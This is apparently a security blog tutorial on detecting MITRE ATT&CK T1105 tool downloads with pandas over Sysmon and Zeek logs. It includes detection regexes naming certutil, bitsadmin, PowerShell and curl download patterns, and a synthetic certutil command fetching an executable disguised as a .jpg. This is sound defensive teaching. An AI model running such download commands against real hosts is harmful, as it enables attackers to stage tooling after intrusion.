After initial access, attackers almost always need to pull more tooling onto the host: a beacon, a credential dumper, a tunneler. That step is Ingress Tool Transfer (T1105) in MITRE ATT&CK, and it is hard to catch with signatures because the transfer mechanisms are legitimate. certutil, bitsadmin, curl, and PowerShell all download files for normal reasons. The signal is in the combination and the rarity, not the binary itself.
This is where a little data science beats another detection rule. Here is how to hunt T1105 in Python across three layers: the process command line, the process-to-network relationship, and the payload on the wire.
Where T1105 Shows Up in Your Logs
Three sources cover most of it:
- Sysmon Event ID 1 (process creation) for the download command line and parent process
- Sysmon Event ID 3 (network connection) to confirm the process actually reached out
- Zeek http.log (or proxy logs) for the file coming across the wire
You can run all three as pandas DataFrames. No SIEM required, which matters when you are working an exported archive from a host you do not control.
Catching LOLBin Downloaders in the Command Line
Start with the living-off-the-land binaries attackers reach for. Load Sysmon Event ID 1 and flag the download patterns:
import pandas as pd

proc = pd.read_csv("sysmon_eid1.csv")  # UtcTime, Image, CommandLine, ParentImage, ProcessGuid

# Download patterns by LOLBin (see the LOLBAS project).
# Groups are non-capturing so str.contains does not warn about match groups.
patterns = {
    "certutil": r"certutil.*(?:-urlcache|-f|-split).*http",
    "bitsadmin": r"bitsadmin.*(?:/transfer|/addfile)",
    "powershell": r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)",
    "mshta": r"mshta.*http",
    "curl_wget": r"\b(?:curl|wget)\b.*http",
}

# Lowercase once so the patterns can stay lowercase
cmd = proc["CommandLine"].fillna("").str.lower()
for name, rx in patterns.items():
    proc[name] = cmd.str.contains(rx, regex=True, na=False)

# Any row matching at least one pattern is a lead
suspect = proc[proc[list(patterns)].any(axis=1)]
This catches the noisy cases. It will also fire on legitimate admin activity, so the command line alone is a lead, not a verdict. The next two layers are what cut the false positives.
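One cheap way to order those command-line leads before moving on is to use the parent process that Event ID 1 already records. The sketch below is an illustration, not part of the original workflow: `rank_by_parent` is a hypothetical helper, the sample rows are synthetic, and it assumes the `ParentImage` and `Image` columns from the export above. It counts how often each parent-child pair appears among the hits and sorts the rarest pairs first.

```python
import pandas as pd

def rank_by_parent(suspect: pd.DataFrame) -> pd.DataFrame:
    """Sort command-line hits so the rarest (parent, child) pairs come first."""
    out = suspect.copy()
    out["parent"] = out["ParentImage"].fillna("").str.lower()
    out["child"] = out["Image"].fillna("").str.lower()
    # Number of hits sharing the same parent/child combination
    out["pair_count"] = out.groupby(["parent", "child"])["child"].transform("size")
    return out.sort_values("pair_count").reset_index(drop=True)

# Synthetic rows for illustration only
sample = pd.DataFrame({
    "ParentImage": [r"C:\Windows\System32\cmd.exe"] * 3
                   + [r"C:\Program Files\Microsoft Office\WINWORD.EXE"],
    "Image": [r"C:\Windows\System32\curl.exe"] * 3
             + [r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"],
})
ranked = rank_by_parent(sample)
print(ranked[["parent", "child", "pair_count"]])
```

In this toy data the single Word-spawned PowerShell hit sorts above the three curl runs from cmd.exe. A rare pair is still only a lead, and a common pair can be malicious, so treat the order as triage priority rather than a filter.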
Beyond Signatures: Rare Process-to-Network Pairs
The stronger signal for T1105 is a process that does not normally talk to the internet suddenly making an external connection. Build a baseline from Sysmon Event ID 3 and flag the rare pairs:
import ipaddress

net = pd.read_csv("sysmon_eid3.csv")  # Image, DestinationIp, DestinationPort, DestinationHostname

def is_external(ip):
    """True for routable destinations; False for private, multicast, or unparseable values."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    # Multicast (e.g. SSDP, mDNS) is not private but is not internet egress either
    return not (addr.is_private or addr.is_multicast)

ext = net[net["DestinationIp"].map(is_external)].copy()
ext["proc"] = ext["Image"].str.lower()

# How often does each process talk externally across the whole environment?
freq = ext.groupby("proc")["DestinationIp"].count()
rare = freq[freq <= 3].index  # processes that almost never egress
flagged = ext[ext["proc"].isin(rare)]
certutil.exe or notepad.exe opening an external connection lands in rare because, fleet-wide, those processes almost never egress. Tune the <= 3 threshold to your environment size and to the time span of the logs: a cutoff of 3 means something different over one day than over one month. For a more principled version, score each (process, destination) pair by frequency and treat the long tail as the hunt queue. That is the same intuition behind anomaly detectors such as scikit-learn's IsolationForest, without the model overhead.
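The pair-scoring idea can be sketched in a few lines. This is one possible scoring, not a prescribed one: `score_pairs` is a hypothetical helper, the surprisal score (negative log2 of each pair's share of external connections) is an assumption chosen for simplicity, and the sample data is synthetic.

```python
import numpy as np
import pandas as pd

def score_pairs(ext: pd.DataFrame) -> pd.DataFrame:
    """Score each (proc, DestinationIp) pair by rarity, rarest first."""
    pairs = (
        ext.groupby(["proc", "DestinationIp"])
           .size()
           .rename("count")
           .reset_index()
    )
    # Share of all external connections accounted for by this pair
    pairs["share"] = pairs["count"] / pairs["count"].sum()
    # Surprisal in bits: the rarer the pair, the higher the score
    pairs["surprisal"] = -np.log2(pairs["share"])
    return pairs.sort_values("surprisal", ascending=False).reset_index(drop=True)

# Synthetic connections for illustration only
sample = pd.DataFrame({
    "proc": ["chrome.exe"] * 6 + ["svchost.exe"] * 2 + ["certutil.exe"],
    "DestinationIp": ["142.250.0.1"] * 6 + ["13.107.4.50"] * 2 + ["203.0.113.7"],
})
queue = score_pairs(sample)
print(queue)
```

Working the queue from the top replaces the hard `<= 3` cutoff with a ranking, so the analyst decides how deep to go. Scoring by raw share favors whatever is rare in the sample, which is why a longer baseline window tends to give a more stable tail.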
Catching the Payload on the Wire
Attackers rename payloads, so do not trust the file extension. Zeek records the actual response MIME type, which is what you want. Parse http.log and filter for executable content regardless of how the URL ends:
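import io

def load_zeek(path):
    """Load a Zeek TSV log, taking column names from its #fields header."""
    cols, rows = None, []
    with open(path) as f:
        for line in f:
            if line.startswith("#fields"):
                cols = line.rstrip("\n").split("\t")[1:]
            elif not line.startswith("#"):
                # Skip only header/footer lines; a '#' inside a field must not truncate the row
                rows.append(line)
    return pd.read_csv(io.StringIO("".join(rows)), sep="\t", names=cols,
                       na_values=["-", "(empty)"])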
http = load_zeek("http.log")  # ts, host, uri, method, resp_mime_types, user_agent

# application/octet-stream is generic, so expect it to be the noisiest of the three
exe_mimes = ["application/x-dosexec", "application/x-msdownload", "application/octet-stream"]
mime = http["resp_mime_types"].fillna("")
downloads = http[mime.str.contains("|".join(exe_mimes), regex=True)].copy()

# A .jpg URL that returns a PE file is a strong T1105 lead
downloads["ext"] = (downloads["uri"].str.lower()
                    .str.extract(r"\.([a-z0-9]{1,5})(?:\?|$)", expand=False))
# Keep rows that have an extension and whose extension is not an executable one
mismatched = downloads[downloads["ext"].notna()
                       & ~downloads["ext"].isin(["exe", "dll", "msi"])]
A URI ending in .jpg that returns application/x-dosexec is the kind of mismatch that almost never has a benign explanation. Pair it with the rare-egress process list above and you have high-confidence T1105 without a single static signature.
Putting It Together
The three layers reinforce each other. The command-line patterns give you candidate processes, the rare process-to-network baseline tells you which ones are abnormal, and the wire data confirms an executable actually moved. A finding that lights up all three is worth waking someone for. One layer alone is a lead to triage.
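A rough way to count how many layers fire per process is sketched below. It rests on assumptions the exports above do not guarantee: that the Event ID 3 data also carries `ProcessGuid` (Sysmon records it, but the CSV columns listed earlier do not show it), and that the Zeek rows keep the responder address in `id.resp_h`. `combine_layers` is a hypothetical helper, the data is synthetic, and the join ignores timestamps, so a shared IP alone can produce coincidental matches.

```python
import pandas as pd

def combine_layers(suspect, ext, flagged, mismatched):
    """Count how many of the three layers fire for each suspect process."""
    out = (suspect[["ProcessGuid", "Image", "CommandLine"]]
           .drop_duplicates("ProcessGuid")
           .copy())
    out["cmdline_hit"] = True  # every row here already matched a pattern

    # Layer 2: the same process instance appears in the rare-egress set
    out["rare_egress"] = out["ProcessGuid"].isin(set(flagged["ProcessGuid"]))

    # Layer 3: the process contacted an IP that served a mismatched executable
    bad_ips = set(mismatched["id.resp_h"])
    hit_guids = set(ext.loc[ext["DestinationIp"].isin(bad_ips), "ProcessGuid"])
    out["wire_hit"] = out["ProcessGuid"].isin(hit_guids)

    out["layers"] = out[["cmdline_hit", "rare_egress", "wire_hit"]].sum(axis=1)
    return out.sort_values("layers", ascending=False).reset_index(drop=True)

# Synthetic inputs for illustration only
suspect = pd.DataFrame({
    "ProcessGuid": ["g1", "g2"],
    "Image": ["certutil.exe", "curl.exe"],
    "CommandLine": ["certutil -urlcache -f http://203.0.113.7/logo.jpg a.exe",
                    "curl http://198.51.100.9/health"],
})
ext = pd.DataFrame({
    "ProcessGuid": ["g1", "g2", "g3"],
    "DestinationIp": ["203.0.113.7", "198.51.100.9", "142.250.0.1"],
})
flagged = ext[ext["ProcessGuid"] == "g1"]
mismatched = pd.DataFrame({"id.resp_h": ["203.0.113.7"], "uri": ["/logo.jpg"]})

result = combine_layers(suspect, ext, flagged, mismatched)
print(result[["ProcessGuid", "cmdline_hit", "rare_egress", "wire_hit", "layers"]])
```

Rows with `layers == 3` are the wake-someone-up findings; rows with one layer go to the triage queue. In practice you would likely also require the network and HTTP events to fall within a short window of the process start time.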
This is the workflow we teach in GTK Cyber's Threat Hunting with Data Science course: building detections from log data and statistics rather than waiting for a vendor signature. If you want the full reference on the technique itself, the T1105 page has the ATT&CK detail and related techniques, and the threat hunting pipeline post shows how to wire these queries into something repeatable.